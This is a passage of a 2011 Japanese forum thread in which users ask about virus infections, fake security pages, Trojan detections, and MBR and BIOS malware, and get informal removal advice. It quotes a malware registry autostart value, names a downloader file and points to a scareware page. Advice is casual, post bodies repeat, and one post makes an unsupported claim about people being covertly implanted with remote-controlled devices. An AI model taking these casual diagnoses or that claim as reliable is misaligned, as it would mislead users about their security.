調べてみたらどうやらウィルスらしいのがわかったので直ぐさまアンインストールし、
残ったフォルダも消しました
しかし完全に消すにはレジストリもいじらなきゃいけないみたいなのですが
正直人のPCなのでレジストリをいじるのは怖いです…
何か他に手はないでしょうか?
sweetIMというツールがいつの間にかインストールされていたようなのですが、
調べてみたらどうやらウィルスらしいのがわかったので直ぐさまアンインストールし、
残ったフォルダも消しました
しかし完全に消すにはレジストリもいじらなきゃいけないみたいなのですが
正直人のPCなのでレジストリをいじるのは怖いです…
何か他に手はないでしょうか?
666 :名無しさん@お腹いっぱい。:2011/02/06(日) 00:10:34
クリーンインストール
667 :名無しさん@お腹いっぱい。:2011/02/06(日) 04:56:31
何か目立った症状が無いなら気にしない
668 :名無しさん@お腹いっぱい。:2011/02/06(日) 09:04:56
>>666
さすがにそれをやる訳には…
>>667
今んとこ目に見えるもので、IEが強制終了されたりDocument and settingsのフォルダにアクセス出来なかったりします
あとは動作が遅くなったりファイルが文字化けしてしまったり…
一応ノートンでフルスキャンしておきましたが、
レジストリには残ってます
やっぱりレジストリをいじるしか無いんでしょうか…?
さすがにそれをやる訳には…
>>667
今んとこ目に見えるもので、IEが強制終了されたりDocument and settingsのフォルダにアクセス出来なかったりします
あとは動作が遅くなったりファイルが文字化けしてしまったり…
一応ノートンでフルスキャンしておきましたが、
レジストリには残ってます
やっぱりレジストリをいじるしか無いんでしょうか…?
669 :名無しさん@お腹いっぱい。:2011/02/06(日) 12:35:43
レジストリってすごい万能だね!
670 :名無しさん@お腹いっぱい。:2011/02/07(月) 00:25:19
671 :名無しさん@お腹いっぱい。:2011/02/07(月) 23:03:23
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「たぶん最新」
オヤジが「画面に何か請求云々っていうのが表示されるHelp!」。
閉じるボタンがない窓、支払いボタン、支払い期限表示、どうみてもワンクリ
請求の奴。いい歳してアダルトサイト彷徨いて引っ掛かったのか。
いろいろ説明すんのも面倒なので、さっさと処置して終了。
聞きたいのは、こーゆーワンクリ請求画面がでるタイプの奴ってさ、
エロサイトで動画見ようとして意味も分からずファイルDL実行しちゃった結果
っつーことでFA?
それともHP見ただけで発症しちゃうこともあんの?
「エロサイト見てんじゃねぇよ。」と決めつけちゃ駄目?
【Microsoft Update(MU)の状態】 「たぶん最新」
オヤジが「画面に何か請求云々っていうのが表示されるHelp!」。
閉じるボタンがない窓、支払いボタン、支払い期限表示、どうみてもワンクリ
請求の奴。いい歳してアダルトサイト彷徨いて引っ掛かったのか。
いろいろ説明すんのも面倒なので、さっさと処置して終了。
聞きたいのは、こーゆーワンクリ請求画面がでるタイプの奴ってさ、
エロサイトで動画見ようとして意味も分からずファイルDL実行しちゃった結果
っつーことでFA?
それともHP見ただけで発症しちゃうこともあんの?
「エロサイト見てんじゃねぇよ。」と決めつけちゃ駄目?
672 :名無しさん@お腹いっぱい。:2011/02/07(月) 23:22:59
トロイなんかはインラインフレームにスクリプト仕込んでインストールとかあるようだけど
請求は知らない
請求は知らない
673 :名無しさん@お腹いっぱい。:2011/02/08(火) 13:06:35
674 :名無しさん@お腹いっぱい。:2011/02/08(火) 15:16:58
>>671
普通はエロサイトだな。
Playとか再生の所をクリックすると実行ファイルがDLされるタイプ。基本的に自分で実行。何も再生されないから
他はニセセキュリティソフトかな。スキャン画像表示して感染してるから駆除しろって出てActiveXインストールしちゃうタイプ。
バナーなんかで画面を乗っ取られてそのサイトに飛ばされちゃうね。
普通はエロサイトだな。
Playとか再生の所をクリックすると実行ファイルがDLされるタイプ。基本的に自分で実行。何も再生されないから
他はニセセキュリティソフトかな。スキャン画像表示して感染してるから駆除しろって出てActiveXインストールしちゃうタイプ。
バナーなんかで画面を乗っ取られてそのサイトに飛ばされちゃうね。
>>672-674
dクス。やっぱ実行物だよねぇ。
感染例などが載っているサイトをよく見て勉強するように言わないと駄目か。
感染して俺にHelp求められても俺自身は感染した経験が無いので完全な対処は
できねぇんで、Helpのたびにナゼ俺が毎回ググル先生の助けを借りて必死
こいて駆除しねぇといけねぇんだよorzマンドクセェ
愚痴こぼして申し訳。
dクス。やっぱ実行物だよねぇ。
感染例などが載っているサイトをよく見て勉強するように言わないと駄目か。
感染して俺にHelp求められても俺自身は感染した経験が無いので完全な対処は
できねぇんで、Helpのたびにナゼ俺が毎回ググル先生の助けを借りて必死
こいて駆除しねぇといけねぇんだよorzマンドクセェ
愚痴こぼして申し訳。
676 :名無しさん@お腹いっぱい。:2011/02/09(水) 22:10:11
677 :名無しさん@お腹いっぱい。:2011/02/09(水) 22:22:24
678 :名無しさん@お腹いっぱい。:2011/02/09(水) 22:33:12
http://www.google.co.jp/search?q=mugen+Pocket+Fighter+akuma&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:ja:official&hl=ja&client=firefox-a
ここから飛んで二番目のURL
ここから飛んで二番目のURL
679 :名無しさん@お腹いっぱい。:2011/02/09(水) 23:03:34
>>678
スキャンgifの後にいっぱい感染してるよな結果を出す詐欺セキュリティーページなのでpc有害
その後ページを右クリか左クリするとloaderav_2004-2_rs5.exeをダウンロードさせようとする
exeのアイコンは何故かAVGのものになっている
名前は違うけどこれとほぼ同じな見た目
http://hibari.2ch.net/test/read.cgi/sec/1287501038/618,627
ウイルストータルの結果
http://www.virustotal.com/file-scan/report.html?id=7d96bede7aa423cfa62084a27b535938415b29555e55a682778add2f470b9761-1297259881
スキャンgifの後にいっぱい感染してるよな結果を出す詐欺セキュリティーページなのでpc有害
その後ページを右クリか左クリするとloaderav_2004-2_rs5.exeをダウンロードさせようとする
exeのアイコンは何故かAVGのものになっている
名前は違うけどこれとほぼ同じな見た目
http://hibari.2ch.net/test/read.cgi/sec/1287501038/618,627
ウイルストータルの結果
http://www.virustotal.com/file-scan/report.html?id=7d96bede7aa423cfa62084a27b535938415b29555e55a682778add2f470b9761-1297259881
680 :名無しさん@お腹いっぱい。:2011/02/09(水) 23:20:23
thx
実行してなかったからセーフみたいですね
実行してなかったからセーフみたいですね
681 :名無しさん@お腹いっぱい。:2011/02/13(日) 13:03:17
よろしくお願いします
【使用OS】 「Windows7 Home Premium」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NOD32の最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【回線・ルータの有無】 「ADSL」ルーター?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Java/TrojanDownloader.OpenStream.NBFの亜種 トロイの木馬
接続が切断されました - 隔離しました
アプリケーションによるウェブへのアクセスにおいて脅威が検出
されました」
sopcastというP2PTVを導入後に上のものが検出されました
どのように対処するべきでしょうか?
今までP2Pソフトは危なそうなので避けていたのですが、便利そうなのでつい手を出してしまいました
【使用OS】 「Windows7 Home Premium」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NOD32の最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【回線・ルータの有無】 「ADSL」ルーター?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Java/TrojanDownloader.OpenStream.NBFの亜種 トロイの木馬
接続が切断されました - 隔離しました
アプリケーションによるウェブへのアクセスにおいて脅威が検出
されました」
sopcastというP2PTVを導入後に上のものが検出されました
どのように対処するべきでしょうか?
今までP2Pソフトは危なそうなので避けていたのですが、便利そうなのでつい手を出してしまいました
682 :名無しさん@お腹いっぱい。:2011/02/17(木) 11:07:59
オンライン好くアンをしたらTrojan.Gen.2 に感染していたようです
C:\Program Files\Common Files\BOONTY Shared\Service\Boonty.exe は Trojan.Gen.2 に感染しています。 シマンテックのレジストリからの駆除方法を試してみました次のサブキーを選択します。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
画面右側で、次の値を削除します。
"winupdates" = "%ProgramFiles%\winupdates\winupdates.exe /auto
レジストリエディタを終了します。
"winupdates"がないです
駆除方法を教えて下さいお願いします
C:\Program Files\Common Files\BOONTY Shared\Service\Boonty.exe は Trojan.Gen.2 に感染しています。 シマンテックのレジストリからの駆除方法を試してみました次のサブキーを選択します。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
画面右側で、次の値を削除します。
"winupdates" = "%ProgramFiles%\winupdates\winupdates.exe /auto
レジストリエディタを終了します。
"winupdates"がないです
駆除方法を教えて下さいお願いします
683 :名無しさん@お腹いっぱい。:2011/02/17(木) 12:02:37
>>682
誤検出じゃないのか?
ゲームのDRMプログラムはよく誤検出することがあるからな
ttp://biglobe.boonty.com/howitworks.php?intMode=2&intIdSite=325#ancre19
誤検出じゃないのか?
ゲームのDRMプログラムはよく誤検出することがあるからな
ttp://biglobe.boonty.com/howitworks.php?intMode=2&intIdSite=325#ancre19
684 :名無しさん@お腹いっぱい。:2011/02/17(木) 12:11:24
>>682
オンライン好くアンって何?
オンライン好くアンって何?
685 :名無しさん@お腹いっぱい。:2011/02/17(木) 15:27:44
686 :名無しさん@お腹いっぱい。:2011/02/19(土) 10:56:37
知恵遅れの嵐軍団がまたまた奇妙な自演自慢質問回答を始めたw
誰の役にも立たないようなことを4545と嵐軍団はよくやるわw・・しかも別IDの自演もいるしw
こんなことして何の自慢がしたいの?運営側のいい加減この嵐連中をどうにかしろよw
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1355873158
誰の役にも立たないようなことを4545と嵐軍団はよくやるわw・・しかも別IDの自演もいるしw
こんなことして何の自慢がしたいの?運営側のいい加減この嵐連中をどうにかしろよw
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1355873158
687 :名無しさん@お腹いっぱい。:2011/02/23(水) 01:52:44.21
194658.exeって新種のウィルス?
688 :名無しさん@お腹いっぱい。:2011/02/23(水) 01:56:12.41
689 :名無しさん@お腹いっぱい。:2011/02/23(水) 02:04:33.66
ごめんなさい、ちと慌ててたんで>>1みないで投稿してしまいました
★質問用テンプレ★
【使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
ソフトはお試しの期限切れたばかりなのでありません。とりあえずMicrosoftの無料のを入れる予定です
変なプロセスが動いてたんでウィルスバスターオンラインスキャンで検索したらこんなのがかかりました
ググっても一件も引っかかりませんでした
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\Windows\System 194658.exe」
★質問用テンプレ★
【使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
ソフトはお試しの期限切れたばかりなのでありません。とりあえずMicrosoftの無料のを入れる予定です
変なプロセスが動いてたんでウィルスバスターオンラインスキャンで検索したらこんなのがかかりました
ググっても一件も引っかかりませんでした
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\Windows\System 194658.exe」
690 :名無しさん@お腹いっぱい。:2011/02/23(水) 02:28:36.94
691 :名無しさん@お腹いっぱい。:2011/02/23(水) 02:34:00.76
>>690
あー、もう削除してしまいました・・・
あー、もう削除してしまいました・・・
692 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:15:23.09
【使用OS】 「Windows7 home」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「アバスト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
1年ぶりにノートン体験版で完全スキャンしたら、トロイの木馬が5〜6個見つかりました
ノートンでウイルスは削除しましたが、個人情報が盗まれてそうで心配です
どう対処すればいいでしょう?
もうひとつ質問ですが、トロイの木馬はバックドアを作ると聞きましたが
このバックドアを削除できるのでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「アバスト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
1年ぶりにノートン体験版で完全スキャンしたら、トロイの木馬が5〜6個見つかりました
ノートンでウイルスは削除しましたが、個人情報が盗まれてそうで心配です
どう対処すればいいでしょう?
もうひとつ質問ですが、トロイの木馬はバックドアを作ると聞きましたが
このバックドアを削除できるのでしょうか?
693 :名無しさん@お腹いっぱい。:2011/02/26(土) 19:59:26.33
>>692
ウイルス名が分からないのでリカバリしろとしか言えん
とりあえず個人情報を盗まれている可能性があるなら
ウイルスに感染していない安全なPCから
サイトのパスワード等をすべて変更する必要がある、かもしれん
あとavast!導入済みの環境にノートンを入れているようだが
常駐タイプのウイルス対策ソフトを複数入れると誤動作することもあるので注意
>このバックドアを削除できるのでしょうか?
システムに深く侵入するタイプなら無理だろうな
削除するにしても取り残しが怖いのでリカバリしたほうがいい
ウイルス名が分からないのでリカバリしろとしか言えん
とりあえず個人情報を盗まれている可能性があるなら
ウイルスに感染していない安全なPCから
サイトのパスワード等をすべて変更する必要がある、かもしれん
あとavast!導入済みの環境にノートンを入れているようだが
常駐タイプのウイルス対策ソフトを複数入れると誤動作することもあるので注意
>このバックドアを削除できるのでしょうか?
システムに深く侵入するタイプなら無理だろうな
削除するにしても取り残しが怖いのでリカバリしたほうがいい
694 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:12:10.69
【使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ESET NOD32(別PCではNorton360)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
john the ripperをダウンロードしたら、Nortonでは反応有、ESET NOD32では無反応。
これってNortonが過剰反応してるだけでしょうか?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Nortonで「Hacktool.JohntheRipper」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ESET NOD32(別PCではNorton360)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
john the ripperをダウンロードしたら、Nortonでは反応有、ESET NOD32では無反応。
これってNortonが過剰反応してるだけでしょうか?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Nortonで「Hacktool.JohntheRipper」
695 :名無しさん@お腹いっぱい。:2011/02/27(日) 01:07:55.69
馬鹿か?
696 :名無しさん@お腹いっぱい。:2011/02/27(日) 01:33:14.12
john the ripperてハッキングツールじゃなかったっけ、そりゃ反応するわ
つまり>>694は馬鹿
つまり>>694は馬鹿
697 :名無しさん@お腹いっぱい。:2011/02/27(日) 16:26:15.94
>>693
レスありがとうございます
>ウイルス名が分からないのでリカバリしろとしか言えん
ウィルスは、Trojan.Gen、Trojan.ADH、Suspicious.Cloud.2、VBS.LoveLetter.A、Downloaderです
>あとavast!導入済みの環境にノートンを入れているようだが
ノートン体験版はアンインスコしました
>システムに深く侵入するタイプなら無理だろうな
>削除するにしても取り残しが怖いのでリカバリしたほうがいい
そうですか・・・難しいんですね
大事なデータ(仕事とか)もあるので出来ればリカバリしたくないんですが
回答ありがとうございます
レスありがとうございます
>ウイルス名が分からないのでリカバリしろとしか言えん
ウィルスは、Trojan.Gen、Trojan.ADH、Suspicious.Cloud.2、VBS.LoveLetter.A、Downloaderです
>あとavast!導入済みの環境にノートンを入れているようだが
ノートン体験版はアンインスコしました
>システムに深く侵入するタイプなら無理だろうな
>削除するにしても取り残しが怖いのでリカバリしたほうがいい
そうですか・・・難しいんですね
大事なデータ(仕事とか)もあるので出来ればリカバリしたくないんですが
回答ありがとうございます
698 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:10:53.78
>>697
>ウィルスは、Trojan.Gen、Trojan.ADH、Suspicious.Cloud.2、VBS.LoveLetter.A、Downloaderです
なんかヒューリスティック等の誤検出かほとんど影響のないアドウェアっぽいな
VBS.LoveLetter.Aはウイルスコードが貼られた2chのdatかなにかか?
Trojan.GenとDownloaderが気になるが枝番がついてないようだからこれも誤検出の可能性が高いな
あとはファイル名と比較して自分で判断してくれ
>ウィルスは、Trojan.Gen、Trojan.ADH、Suspicious.Cloud.2、VBS.LoveLetter.A、Downloaderです
なんかヒューリスティック等の誤検出かほとんど影響のないアドウェアっぽいな
VBS.LoveLetter.Aはウイルスコードが貼られた2chのdatかなにかか?
Trojan.GenとDownloaderが気になるが枝番がついてないようだからこれも誤検出の可能性が高いな
あとはファイル名と比較して自分で判断してくれ
699 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:01:11.89
>>698
>なんかヒューリスティック等の誤検出かほとんど影響のないアドウェアっぽいな
それを聞いて安心しました
ノートンでは、危険度1の「ほとんど影響なし」とでましたが
トロイがあったので心配していました
>VBS.LoveLetter.Aはウイルスコードが貼られた2chのdatかなにかか?
プラウザで2chを見るためのアドオンから出ました、datです
>あとはファイル名と比較して自分で判断してくれ
はい、自分で色々しらべてみます
レスありがとうございます
>なんかヒューリスティック等の誤検出かほとんど影響のないアドウェアっぽいな
それを聞いて安心しました
ノートンでは、危険度1の「ほとんど影響なし」とでましたが
トロイがあったので心配していました
>VBS.LoveLetter.Aはウイルスコードが貼られた2chのdatかなにかか?
プラウザで2chを見るためのアドオンから出ました、datです
>あとはファイル名と比較して自分で判断してくれ
はい、自分で色々しらべてみます
レスありがとうございます
700 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:08:16.93
質問です。
仮にウィルスが検出されたパソコンにフロッピーを入れるとして、
そのフロッピーに勝手にウィルス等が入ることはありますか?
(メモ帳などのファイルしか入ってなくても感染はしますか?)
仮に感染するとして、そのフロッピーを他のPCに使ったらそっちにも移りますよね?
仮にウィルスが検出されたパソコンにフロッピーを入れるとして、
そのフロッピーに勝手にウィルス等が入ることはありますか?
(メモ帳などのファイルしか入ってなくても感染はしますか?)
仮に感染するとして、そのフロッピーを他のPCに使ったらそっちにも移りますよね?
701 :名無しさん@お腹いっぱい。:2011/03/01(火) 16:59:43.81
>>700
リムーバブルメディアの自動実行が有効である限り感染するようだ
ttp://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-Mmorpg.gen
リムーバブルメディアの自動実行が有効である限り感染するようだ
ttp://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-Mmorpg.gen
702 :名無しさん@お腹いっぱい。:2011/03/07(月) 18:09:43.08
まだ報道されていない犯罪です。
夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり
また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。
奈良県生駒市北部に被害者多数のようです。
夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり
また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。
奈良県生駒市北部に被害者多数のようです。
703 : 忍法帖【Lv=15,xxxPT】 :2011/03/08(火) 11:46:20.03
【使用OS】 「WinXP Home sp3 (32bit)」
【Microsoft Update(MU)の状態】 「手動 (前回は2月末に更新)」
【使用セキュリティソフトとバージョン】 「avast 5.0.677」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「不明 (未導入?)」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「(同上)」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「2ch の PC初心者板(pcqa) をFireFoxで見ようとして LoveLetter-C ワーム検出
ブロックされ、avastが接続を切断した。
その後、ここのセキュリティ板(sec) を見ようとしても、同じ現象になった」
そのときの avast のメッセージ表示を貼ってみます
ttp://up.mugitya.com/img/Lv.1_up136511.png
何かを誤検出してるのでしょうか?
よくわからないので、この質問はギコナビで書込みました
【Microsoft Update(MU)の状態】 「手動 (前回は2月末に更新)」
【使用セキュリティソフトとバージョン】 「avast 5.0.677」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「不明 (未導入?)」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「(同上)」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「2ch の PC初心者板(pcqa) をFireFoxで見ようとして LoveLetter-C ワーム検出
ブロックされ、avastが接続を切断した。
その後、ここのセキュリティ板(sec) を見ようとしても、同じ現象になった」
そのときの avast のメッセージ表示を貼ってみます
ttp://up.mugitya.com/img/Lv.1_up136511.png
何かを誤検出してるのでしょうか?
よくわからないので、この質問はギコナビで書込みました
704 :名無しさん@お腹いっぱい。:2011/03/08(火) 13:21:28.18
706 :名無しさん@お腹いっぱい。:2011/03/09(水) 01:59:27.10
すみません
http://nagamochi.info/src/up51725.jpg
これクリックしたらHなサイト出てきたのですが、これは画像ファイルではなく、悪質なウィルスサイトでしょうか><
何もウィルス対策ソフト入れてないので、感染したらどうしよう・・・
http://nagamochi.info/src/up51725.jpg
これクリックしたらHなサイト出てきたのですが、これは画像ファイルではなく、悪質なウィルスサイトでしょうか><
何もウィルス対策ソフト入れてないので、感染したらどうしよう・・・
707 :名無しさん@お腹いっぱい。:2011/03/09(水) 02:39:25.95
ウィルスではないようだけどここで聞いてそれを信じるの?
何か鑑定スレのような感じになってるような
何か鑑定スレのような感じになってるような
708 :名無しさん@お腹いっぱい。:2011/03/09(水) 03:54:50.59
>>706
その画像とっくに404だからロダのトップページに飛ばされてるだけの気が
その画像とっくに404だからロダのトップページに飛ばされてるだけの気が
709 :名無しさん@お腹いっぱい。:2011/03/09(水) 11:18:10.91
一体どのセキュリティソフトがいいんだろ…
どのスレ見てもそのソフトは最底辺みたいに言ってる奴がいるし…
どのスレ見てもそのソフトは最底辺みたいに言ってる奴がいるし…
710 :名無しさん@お腹いっぱい。:2011/03/09(水) 13:50:40.48
>>709
セキュ板はID出ないからそんなもんだ
自分はアプリの脆弱性さえ塞いでいればなんでもいいと思うのでフリーだが
そのあたりよくわからないなら脆弱性保護機能のあるノートンか
やや上級者向けだが総合力が高そうなカスペルスキーあたりを薦めるな
セキュ板はID出ないからそんなもんだ
自分はアプリの脆弱性さえ塞いでいればなんでもいいと思うのでフリーだが
そのあたりよくわからないなら脆弱性保護機能のあるノートンか
やや上級者向けだが総合力が高そうなカスペルスキーあたりを薦めるな
711 :名無しさん@お腹いっぱい。:2011/03/09(水) 13:56:59.44
特定のセキュリティソフトを執念に何度も叩いてる奴はなんなんだ?
そのソフトに恨みでもあるのか?
そのソフトに恨みでもあるのか?
712 :名無しさん@お腹いっぱい。:2011/03/09(水) 16:10:44.08
使い方が分からなかった人が
使っている人を妬んでいるだけ
使っている人を妬んでいるだけ
713 :名無しさん@お腹いっぱい。:2011/03/13(日) 17:08:08.68
次スレからタイトルを「ウイルス」にした方がいいと思うんだ
714 :名無しさん@お腹いっぱい。:2011/03/16(水) 10:59:51.63
無駄なデータを書き込むことでHDDデータを完全削除するヤツを実行したのですが
これでマスターブートレコードとかに存在するかもしれない
ウィルスも削除出来てるのでしょうか?
画面には「HDDを完全に削除〜」と書かれていたのですが
この”完全”にはMBRも含まれるのでしょうか?
これでマスターブートレコードとかに存在するかもしれない
ウィルスも削除出来てるのでしょうか?
画面には「HDDを完全に削除〜」と書かれていたのですが
この”完全”にはMBRも含まれるのでしょうか?
715 :名無しさん@お腹いっぱい。:2011/03/17(木) 11:22:43.35
タスクマネージャにMESC.exeというプロセスがあるのですが
これは何のプログラムですか?
これは何のプログラムですか?
716 :名無しさん@お腹いっぱい。:2011/03/17(木) 13:50:57.62
717 :名無しさん@お腹いっぱい。:2011/03/18(金) 15:39:20.02
出来るだけ早く回答が欲しいです。
友人からPCを譲ってもらったのですが
使う前に、とにかく完全にウィルスなどを消してから使いたいのですが
完全にウィルスを消すにはどうしたらいいのでしょうか?
ただのフォーマットでは消えないウィルスもあると聞き、
どうしたらいいのか悩んでいます。
友人からPCを譲ってもらったのですが
使う前に、とにかく完全にウィルスなどを消してから使いたいのですが
完全にウィルスを消すにはどうしたらいいのでしょうか?
ただのフォーマットでは消えないウィルスもあると聞き、
どうしたらいいのか悩んでいます。
718 :名無しさん@お腹いっぱい。:2011/03/18(金) 16:43:38.93
>>717
最近は少ないと思うがマスターブートレコード(MBR)の初期化が必要なものと
BIOSに寄生するものがある
もっともここで質問するようじゃ対処は難しいと思うので
フォーマットかリカバリした上でノートン等の
ディスクからブート可能なウイルス対策ソフトで
フルスキャンをかけるくらいが現実的だろう
まあそんなに深刻にならなくてもいいから
リカバリしても動作がおかしいならやればよかろう
最近は少ないと思うがマスターブートレコード(MBR)の初期化が必要なものと
BIOSに寄生するものがある
もっともここで質問するようじゃ対処は難しいと思うので
フォーマットかリカバリした上でノートン等の
ディスクからブート可能なウイルス対策ソフトで
フルスキャンをかけるくらいが現実的だろう
まあそんなに深刻にならなくてもいいから
リカバリしても動作がおかしいならやればよかろう
>>718
回答ありがとうございます。
・BIOSのウィルスはアンチウィルスソフトの目は届かないのでしょうか?
・MBRに感染するウィルスはただのHDDのフォーマットでは駆除できないのですか?
(MBRもハードディスクの内ですよね?)
心配なので教えてください。
回答ありがとうございます。
・BIOSのウィルスはアンチウィルスソフトの目は届かないのでしょうか?
・MBRに感染するウィルスはただのHDDのフォーマットでは駆除できないのですか?
(MBRもハードディスクの内ですよね?)
心配なので教えてください。
すみません、分かりにくかったかも…
・BIOSに感染するウィルスはアンチウィルスソフト駆除可能ですか?
・BIOSに感染するウィルスはアンチウィルスソフト駆除可能ですか?
721 :名無しさん@お腹いっぱい。:2011/03/18(金) 20:13:29.36
>・BIOSに感染するウィルスはアンチウィルスソフト駆除可能ですか?
CMOSクリアをするしかないと思われる
>・MBRに感染するウィルスはただのHDDのフォーマットでは駆除できないのですか?
フォーマットではMBRの領域は初期化されない
OSのインストールをするとMBRを書き換えることになるので同時に駆除される
CMOSクリアをするしかないと思われる
>・MBRに感染するウィルスはただのHDDのフォーマットでは駆除できないのですか?
フォーマットではMBRの領域は初期化されない
OSのインストールをするとMBRを書き換えることになるので同時に駆除される
回答ありがとうございます。
何度も質問してすみません。最後の質問にしたいと思います。
>>721
>OSのインストールをするとMBRを書き換えることになるので同時に駆除される
リカバリーCDを使って購入時の状態に戻す、という作業でも駆除されますか?
何度も質問してすみません。最後の質問にしたいと思います。
>>721
>OSのインストールをするとMBRを書き換えることになるので同時に駆除される
リカバリーCDを使って購入時の状態に戻す、という作業でも駆除されますか?
723 :名無しさん@お腹いっぱい。:2011/03/18(金) 21:09:07.10
>>722
通常問題ないがザルなリカバリプロセスだとMBRを考慮していないかもしれない
さすがにこれはメーカーにしかわからない
何のためのリカバリか分からなくなるのでまずは問題ないと思うが
気になるならMBRの修復方法はググれば出てくるのでやってみればいい
通常問題ないがザルなリカバリプロセスだとMBRを考慮していないかもしれない
さすがにこれはメーカーにしかわからない
何のためのリカバリか分からなくなるのでまずは問題ないと思うが
気になるならMBRの修復方法はググれば出てくるのでやってみればいい
724 :名無しさん@お腹いっぱい。:2011/03/18(金) 21:13:10.35
ルートキットについて調べている者ですが質問です。
wikiなどで調べたところ、
「ルートキットとはクラッカーが侵入したPCを乗っ取る為に使うツールの詰め合わせ」
だそうですが、特に検出しにくい悪質なトロイの木馬の事を指して
”ルートキット”と呼ぶ事もあるのですか?(というかその方が多い?)
どうもウィルス対策を呼びかけているサイトなどで言われる”ルートキット”は
後者を指しているような気がしてならないのです。
wikiなどで調べたところ、
「ルートキットとはクラッカーが侵入したPCを乗っ取る為に使うツールの詰め合わせ」
だそうですが、特に検出しにくい悪質なトロイの木馬の事を指して
”ルートキット”と呼ぶ事もあるのですか?(というかその方が多い?)
どうもウィルス対策を呼びかけているサイトなどで言われる”ルートキット”は
後者を指しているような気がしてならないのです。
726 :名無しさん@お腹いっぱい。:2011/03/19(土) 13:39:55.89
非常に困っています!
海外のフリーソフトをインストールしたせいか、
IEを開くとAskという検索エンジンに繋がってしまいます。
元に戻す方法が分かりません。
プログラムの追加と削除から「Ask toolbar」をアンインストールしようとしても出来ません。
削除する方法を教えてください。お願いします。
海外のフリーソフトをインストールしたせいか、
IEを開くとAskという検索エンジンに繋がってしまいます。
元に戻す方法が分かりません。
プログラムの追加と削除から「Ask toolbar」をアンインストールしようとしても出来ません。
削除する方法を教えてください。お願いします。
727 :名無しさん@お腹いっぱい。:2011/03/19(土) 14:20:54.02
728 :名無しさん@お腹いっぱい。:2011/03/19(土) 14:56:49.33
>>724
ルート権限を奪取するためのツール群(キット)が元の意味で
特徴として高度な隠蔽能力があるがトロイの木馬との親和性が高いため
ルートキットの多くがこの機能を持つ
攻撃者側のツールであり、また一般ユーザにとっては難解なhttp://hibari.2ch.net/test/read.cgi/software/1300289684/122
ウイルスでもある
こんな感じの理解でいいんじゃなかろうか
ルート権限を奪取するためのツール群(キット)が元の意味で
特徴として高度な隠蔽能力があるがトロイの木馬との親和性が高いため
